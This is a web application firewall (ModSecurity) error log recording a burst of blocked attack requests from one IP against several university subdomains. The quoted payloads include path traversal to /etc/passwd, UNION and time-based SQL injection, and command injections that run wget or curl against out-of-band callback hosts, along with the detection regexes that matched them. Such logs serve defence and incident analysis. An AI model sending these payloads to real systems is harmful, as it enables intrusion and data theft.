[Tue Aug 29 11:31:20.343444 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQP66MAAAAx"]
[Tue Aug 29 11:31:20.343902 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQSWLIAAAA0"]
[Tue Aug 29 11:31:20.362483 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQJWrwAAAAr"]
[Tue Aug 29 11:31:20.373139 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQFcRQAAAAn"]
[Tue Aug 29 11:31:21.325552 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mcCo-f0AAAPRNgsAAAAf"]
[Tue Aug 29 11:31:22.480251 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "pusatbahasa.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQJWsEAAAAr"]
[Tue Aug 29 11:31:22.483177 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "informatika.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQQykUAAAAy"]
[Tue Aug 29 11:31:22.487370 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "journal.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQTKHIAAAA1"]
[Tue Aug 29 11:31:22.488216 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "www.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAPMmIIAAAAY"]
[Tue Aug 29 11:31:22.498291 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAO88BYAAAAF"]
[Tue Aug 29 11:31:22.519118 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "ft.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQFcRYAAAAn"]
[Tue Aug 29 11:31:23.322738 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQFcRcAAAAn"]
[Tue Aug 29 11:31:23.324480 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAPMmIQAAAAY"]
[Tue Aug 29 11:31:23.328953 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQEGHoAAAAm"]
[Tue Aug 29 11:31:23.329298 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAN@5EUAAAAO"]
[Tue Aug 29 11:31:23.330696 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAPahx8AAAAL"]
[Tue Aug 29 11:31:24.343988 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgm9xwp578nirht.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQEGHwAAAAm"]
[Tue Aug 29 11:31:24.356568 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10nMCo-f0AAAP8GzoAAAAV"]
[Tue Aug 29 11:31:24.581198 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgy3af819epqjcs.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQMrqQAAAAu"]
[Tue Aug 29 11:31:24.583783 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlggcwmq4mneko3o.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQFcRsAAAAn"]
[Tue Aug 29 11:31:24.593408 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlg7iiej4ojm1jy9.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAP@MyMAAAAZ"]
[Tue Aug 29 11:31:24.594238 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgstu15mqmj7pqj.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQJWscAAAAr"]
[Tue Aug 29 11:31:24.636511 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlg5uo5fhkeacrao.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAP@MyQAAAAZ"]
[Tue Aug 29 11:31:25.301278 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlg46jm3drdxm7e4.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQJWskAAAAr"]
[Tue Aug 29 11:31:25.303485 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlg561qyjqphk1cf.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQR440AAAAz"]
[Tue Aug 29 11:31:25.319709 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgu8sja4km5dbax.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQOv1cAAAAw"]
[Tue Aug 29 11:31:25.355856 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlga6ex641xfudkf.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAN@5EwAAAAO"]
[Tue Aug 29 11:31:25.370121 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlghgh5naqurzupc.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQR45AAAAAz"]
[Tue Aug 29 11:31:25.438701 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgxtfkdz8tfq3u6.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAPahyYAAAAL"]
